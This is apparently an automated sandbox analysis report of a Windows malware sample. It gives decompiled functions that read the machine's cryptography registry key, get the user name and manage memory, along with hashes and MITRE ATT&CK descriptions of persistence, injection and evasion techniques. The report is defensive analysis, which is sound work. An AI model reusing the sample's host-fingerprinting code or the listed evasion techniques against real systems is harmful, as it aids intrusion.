0x0040346f
0x00403472
0x00403479
0x00403479
0x00403472
0x00403462
0x0040347e
0x00403487
0x00403489
0x00403489
0x00403490
0x00403492
0x00403492
0x0040349a
0x004034a3
0x004034a5
0x004034a5
0x004034ae
0x004034ae
0x004034bf
0x004034bf
0x004034c1
0x00000000
0x00403412
0x00403412
0x00403418
0x0040341c
0x0040341e
0x00000000
0x00403412

APIs

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 00403479
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 004034AE

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: 1d3e21be2f222e88a5ce5129c4af818b1f382a2d1c87c05034a25e8df98eeb83
Instruction ID: 9b75380a0c1bb1c5ffdc64597b03c40b9c34cb72d282d073c18e6e74c6ec6d76
Opcode Fuzzy Hash: 1d3e21be2f222e88a5ce5129c4af818b1f382a2d1c87c05034a25e8df98eeb83
Instruction Fuzzy Hash: F42141709002408BDB229F6684847567FA9AF49316F2585BBE844AE2C6D77CCAC0CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00406E68, Relevance: 3.1, APIs: 2, Instructions: 58
registryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00406E68(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
				char _v8;
				char _v12;
				int _v16;
				int _v20;
				void* _v24;
				char _v536;
				void* _t18;
				intOrPtr _t52;
				void* _t56;

				_t18 = __eax - 0x55000000;
				_v12 = __ecx;
				_v8 = __edx;
				E00404150( &_v8);
				E00404150( &_v12);
				_push(_t56);
				_push(0x406f1f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xfffffdec;
				_v20 = 0xfe;
				_v536 = 0;
				RegOpenKeyExW(_t18, E00403D98(_v8), 0, 0x20119,  &_v24); // executed
				RegQueryValueExW(_v24, E00403D98(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
				E00403D6C(_a4, 0x100,  &_v536);
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(E00406F26);
				return E00403BF4( &_v12, 2);
			}

0x00406e68
0x00406e76
0x00406e79
0x00406e81
0x00406e89
0x00406e90
0x00406e91
0x00406e96
0x00406e99
0x00406e9c
0x00406ea3
0x00406ec8
0x00406eef
0x00406eff
0x00406f06
0x00406f09
0x00406f0c
0x00406f1e

APIs

Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406EC8
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406EEF

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: String$AllocFreeOpenQueryValue
String ID:
API String ID: 967375698-0
Opcode ID: 75d402b96af35ef4be622c85e7f42c5874bf5a9438753516473e280561b1ff26
Instruction ID: 95dba4e9abc9c412b13e6587c625634e660d61312d90d7235186b1c7fae4ad03
Opcode Fuzzy Hash: 75d402b96af35ef4be622c85e7f42c5874bf5a9438753516473e280561b1ff26
Instruction Fuzzy Hash: DB114970600209AFD700EF98D992ADEBBFCEF48704F4000B6B508E7291E774AB448BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00406E6C, Relevance: 3.1, APIs: 2, Instructions: 58
registryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00406E6C(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
				char _v8;
				char _v12;
				int _v16;
				int _v20;
				void* _v24;
				char _v536;
				void* _t44;
				intOrPtr _t51;
				void* _t55;

				_v12 = __ecx;
				_v8 = __edx;
				_t44 = __eax;
				E00404150( &_v8);
				E00404150( &_v12);
				_push(_t55);
				_push(0x406f1f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffdec;
				_v20 = 0xfe;
				_v536 = 0;
				RegOpenKeyExW(_t44, E00403D98(_v8), 0, 0x20119,  &_v24); // executed
				RegQueryValueExW(_v24, E00403D98(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
				E00403D6C(_a4, 0x100,  &_v536);
				_pop(_t51);
				 *[fs:eax] = _t51;
				_push(E00406F26);
				return E00403BF4( &_v12, 2);
			}

0x00406e76
0x00406e79
0x00406e7c
0x00406e81
0x00406e89
0x00406e90
0x00406e91
0x00406e96
0x00406e99
0x00406e9c
0x00406ea3
0x00406ec8
0x00406eef
0x00406eff
0x00406f06
0x00406f09
0x00406f0c
0x00406f1e

APIs

Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406EC8
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406EEF

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: String$AllocFreeOpenQueryValue
String ID:
API String ID: 967375698-0
Opcode ID: 93ffc18aff940630c773c39f869c9b73eb077ec6050040de7a5362879dcd2ece
Instruction ID: d6839de15ce0d986496e2f56cedbfcdd5c795bc72117923b9a37f873fbd9eab1
Opcode Fuzzy Hash: 93ffc18aff940630c773c39f869c9b73eb077ec6050040de7a5362879dcd2ece
Instruction Fuzzy Hash: E0111971640209AFD700EB99DD86EDEBBFCEF48704F5000B6B508E7291DB74AB448A65

Uniqueness

Uniqueness Score: -1.00%

Function 00401388, Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401388(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E0040123C(0x41c5d4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}

0x0040138b
0x00401395
0x004013a4
0x00401397
0x00401397
0x00401397
0x004013aa
0x004013b7
0x004013bc
0x004013be
0x004013c2
0x004013cb
0x004013d2
0x004013de
0x004013e5
0x00000000
0x004013e5
0x004013d2
0x004013ea

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
Opcode Fuzzy Hash: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299

Uniqueness

Uniqueness Score: -1.00%

Function 004065E8, Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065E8(intOrPtr* __eax) {
				short _v516;
				signed int _t4;
				signed int _t5;
				int _t9;
				void* _t11;
				signed int _t14;
				void* _t18;
				DWORD* _t19;

				_t4 = __eax +  *__eax;
				 *_t4 =  *_t4 + _t4;
				_t5 = _t4 | 0x5300000a;
				_t19 = _t18 + 0xfffffdfc;
				_t14 = _t5;
				 *_t19 = 0xff;
				_t9 = GetUserNameW( &_v516, _t19); // executed
				if(_t9 == 0) {
					_t11 = E00403BDC(_t14);
				} else {
					_t11 = E00403D6C(_t14, 0x100,  &_v516);
				}
				return _t11;
			}

0x004065e8
0x004065ea
0x004065ec
0x004065f1
0x004065f7
0x004065f9
0x0040660d
0x00406611
0x00406627
0x00406613
0x0040661e
0x0040661e
0x00406633

APIs

GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 153b4ec9fa6da1239e45f29a021cf1180a625503ea610292dda7591db46c391b
Instruction ID: 5a5990060c673b8f00593b581c9a0ee3644ab744bab1f058c1932740bd518d27
Opcode Fuzzy Hash: 153b4ec9fa6da1239e45f29a021cf1180a625503ea610292dda7591db46c391b
Instruction Fuzzy Hash: 1BE0DFB12083424FC3119BA8D880AA53BE49F49300F044876B8D5C72E1FE35CE248753

Uniqueness

Uniqueness Score: -1.00%

Function 004065F0, Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065F0(void* __eax) {
				short _v516;
				int _t7;
				void* _t12;
				DWORD* _t15;

				_t15 =  &_v516;
				_t12 = __eax;
				 *_t15 = 0xff;
				_t7 = GetUserNameW( &_v516, _t15); // executed
				if(_t7 == 0) {
					return E00403BDC(_t12);
				}
				return E00403D6C(_t12, 0x100,  &_v516);
			}

0x004065f1
0x004065f7
0x004065f9
0x0040660d
0x00406611
0x00000000
0x00406627
0x00000000

APIs

GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 13019b4b1f29ee0087aebdb125924ac5399b3b0493059617e1aab9744803bb35
Instruction ID: 8736a32cbc394a18a167da55deab102dfeb87f5e75d2630db682c36262db7282
Opcode Fuzzy Hash: 13019b4b1f29ee0087aebdb125924ac5399b3b0493059617e1aab9744803bb35
Instruction Fuzzy Hash: 26E086717042024BD310AF6CDC81A9976E89B48315F00483AB896D73D1FE3DDE189757

Uniqueness

Uniqueness Score: -1.00%

Function 004065EC, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065EC(signed int __eax) {
				short _v516;
				signed int _t4;
				int _t8;
				void* _t10;
				signed int _t13;
				void* _t17;
				DWORD* _t18;

				_t4 = __eax | 0x5300000a;
				_t18 = _t17 + 0xfffffdfc;
				_t13 = _t4;
				 *_t18 = 0xff;
				_t8 = GetUserNameW( &_v516, _t18); // executed
				if(_t8 == 0) {
					_t10 = E00403BDC(_t13);
				} else {
					_t10 = E00403D6C(_t13, 0x100,  &_v516);
				}
				return _t10;
			}

0x004065ec
0x004065f1
0x004065f7
0x004065f9
0x0040660d
0x00406611
0x00406627
0x00406613
0x0040661e
0x0040661e
0x00406633

APIs

GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 60f9d436da294c5ff49d132d20e00676374c28b1533c3170959a1c115f4756e2
Instruction ID: 7803372b71e91cd4900786e151d6695f3fca8b78fda9d7e8201226f5ab6c0eae
Opcode Fuzzy Hash: 60f9d436da294c5ff49d132d20e00676374c28b1533c3170959a1c115f4756e2
Instruction Fuzzy Hash: D7E08CB16043065BD3109AA8D880AAA76E89B88300F00493AB89AD73D0FE39CE248647

Uniqueness

Uniqueness Score: -1.00%

Function 00403604, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403604(char* __eax, short* __ecx, int __edx, int _a4) {
				int _t4;
				int _t5;

				_t4 =  *0x41c5a8; // 0x3
				_t5 = WideCharToMultiByte(_t4, 0, __ecx, _a4, __eax, __edx, 0, 0); // executed
				return _t5;
			}

0x00403614
0x0040361a
0x00403620

APIs

WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000001,00000000,00000000,00000001,004036B0,00000000), ref: 0040361A

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
Instruction ID: 7e1ccd6cea493bd3454663dff710d39ec61ca1bdc7a044e150527f2c3e7482f1
Opcode Fuzzy Hash: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
Instruction Fuzzy Hash: 1EC002B22802087FE5149A9ADC46FA7769C9758B50F108029B7089E1D1D5A5B85046BC

Uniqueness

Uniqueness Score: -1.00%

Function 00401464, Relevance: 1.3, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401464(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr* _v32;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t31;
				int _t32;
				intOrPtr* _t35;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				intOrPtr* _t45;

				_t45 =  &_v20;
				_v32 = __ecx;
				 *_t45 = __edx;
				_v28 = 0xffffffff;
				_v24 = 0;
				_t44 = __eax;
				_v20 =  *_t45 + __eax;
				_t35 =  *0x41c5d4; // 0x41c5d4
				while(_t35 != 0x41c5d4) {
					_t42 =  *_t35;
					_t5 = _t35 + 8; // 0x0
					_t43 =  *_t5;
					if(_t44 <= _t43) {
						_t6 = _t35 + 0xc; // 0x0
						if(_t43 +  *_t6 <= _v20) {
							if(_t43 < _v28) {
								_v28 = _t43;
							}
							_t10 = _t35 + 0xc; // 0x0
							_t31 = _t43 +  *_t10;
							if(_t31 > _v24) {
								_v24 = _t31;
							}
							_t32 = VirtualFree(_t43, 0, 0x8000); // executed
							if(_t32 == 0) {
								 *0x41c5b0 = 1;
							}
							E0040126C(_t35);
						}
					}
					_t35 = _t42;
				}
				_t24 = _v32;
				 *_t24 = 0;
				if(_v24 == 0) {
					return _t24;
				}
				 *_v32 = _v28;
				_t27 = _v24 - _v28;
				 *((intOrPtr*)(_v32 + 4)) = _t27;
				return _t27;
			}

0x00401468
0x0040146b
0x0040146f
0x00401472
0x0040147c
0x00401480
0x00401487
0x0040148b
0x004014e4
0x00401493
0x00401495
0x00401495
0x0040149a
0x0040149e
0x004014a5
0x004014ab
0x004014ad
0x004014ad
0x004014b3
0x004014b3
0x004014ba
0x004014bc
0x004014bc
0x004014c8
0x004014cf
0x004014d1
0x004014d1
0x004014dd
0x004014dd
0x004014a5
0x004014e2
0x004014e2
0x004014ec
0x004014f2
0x004014f9
0x0040151b
0x0040151b
0x00401503
0x00401509
0x00401511
0x00000000

APIs

VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004014C8

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
Instruction ID: bdb72b2e4f8392e9a4367bae485781504843fed35f2e07c9585e1bdde9d69fdb
Opcode Fuzzy Hash: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
Instruction Fuzzy Hash: 2621F770608710AFC710DF19C8C0A5BBBE5EF85760F14C96AE4989B3A5D378EC41CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040151C, Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040151C(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x41c5d4; // 0x41c5d4
				while(_t29 != 0x41c5d4) {
					_t7 = _t29 + 8; // 0x0
					_t17 =  *_t7;
					_t8 = _t29 + 0xc; // 0x0
					_t27 =  *_t8 + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}

0x00401523
0x00401527
0x0040152e
0x00401543
0x0040154b
0x00401551
0x00401557
0x0040155a
0x0040159e
0x00401562
0x00401562
0x00401565
0x00401568
0x0040156c
0x0040156e
0x0040156e
0x00401574
0x00401576
0x00401576
0x0040157c
0x00401589
0x00401590
0x00401592
0x00401598
0x00000000
0x00401598
0x00401590
0x0040159c
0x0040159c
0x004015ad

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00401589

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
Instruction ID: d2e5847c23a0d0fb2b7a3dff60909d67c0489ed435542f313e0fa7b23e2e95f5
Opcode Fuzzy Hash: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
Instruction Fuzzy Hash: 67115E72A44701AFC3109E29CC80A6BBBE2EBC4750F15C539E5996B3A5D734AC408B89

Uniqueness

Uniqueness Score: -1.00%

Function 004015B0, Relevance: 1.3, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004015B0(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x41c5d4; // 0x41c5d4
				while(_t19 != 0x41c5d4) {
					_t2 = _t19 + 8; // 0x0
					_t9 =  *_t2;
					_t3 = _t19 + 0xc; // 0x0
					_t14 =  *_t3 + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x41c5b0 = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}

0x004015b4
0x004015c5
0x004015cc
0x004015d5
0x004015d9
0x004015dc
0x004015df
0x0040161f
0x004015e7
0x004015e7
0x004015ea
0x004015ed
0x004015f2
0x004015f4
0x004015f4
0x004015f9
0x004015fb
0x004015fb
0x004015ff
0x0040160a
0x00401611
0x00401613
0x00401613
0x00401611
0x0040161d
0x0040161d
0x0040162c

APIs

VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,-00000008,00003FFB,00401817), ref: 0040160A

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
Instruction ID: 104411973d7795ae4b76250d277c099600c8cf09cd5a8da0f47b470ca133b76a
Opcode Fuzzy Hash: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
Instruction Fuzzy Hash: 82012B726443105FC3109F28DDC0E6A77E5DBC5324F19493EDA85AB391D33B6C0187A8

Uniqueness

Uniqueness Score: -1.00%

Function 004011E4, Relevance: 1.3, APIs: 1, Instructions: 34
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004011E4() {
				intOrPtr* _t4;
				void* _t5;
				void _t6;
				intOrPtr* _t9;
				void* _t12;
				void* _t14;

				if( *0x41c5d0 != 0) {
					L5:
					_t4 =  *0x41c5d0;
					 *0x41c5d0 =  *_t4;
					return _t4;
				} else {
					_t5 = LocalAlloc(0, 0x644); // executed
					_t12 = _t5;
					if(_t12 != 0) {
						_t6 =  *0x41c5cc; // 0x0
						 *_t12 = _t6;
						 *0x41c5cc = _t12;
						_t14 = 0;
						do {
							_t2 = (_t14 + _t14) * 8; // 0x4
							_t9 = _t12 + _t2 + 4;
							 *_t9 =  *0x41c5d0;
							 *0x41c5d0 = _t9;
							_t14 = _t14 + 1;
						} while (_t14 != 0x64);
						goto L5;
					} else {
						return 0;
					}
				}
			}

0x004011ee
0x0040122a
0x0040122a
0x0040122e
0x00401232
0x004011f0
0x004011f7
0x004011fc
0x00401200
0x00401207
0x0040120c
0x0040120e
0x00401214
0x00401216
0x0040121a
0x0040121a
0x00401220
0x00401222
0x00401224
0x00401225
0x00000000
0x00401202
0x00401206
0x00401206
0x00401200

APIs

LocalAlloc.KERNEL32(00000000,00000644,?,0041C5D4,00401247,?,?,00401447,?,00100000,00002000,00000004,0041C5E4,?,?), ref: 004011F7

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 1d034d2b76be25e021de9249ef1b5bcb9b446cb3610b695d9b1e5c5957ac038c
Instruction ID: 1b97f869ca2ef78b7edf313f24570502d3759f43221a4d236e640dffafdc993f
Opcode Fuzzy Hash: 1d034d2b76be25e021de9249ef1b5bcb9b446cb3610b695d9b1e5c5957ac038c
Instruction Fuzzy Hash: 5FF05E727402119FD714CF69D8806A577E6EBAD315F20847ED185E77A0E635AC418B48

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

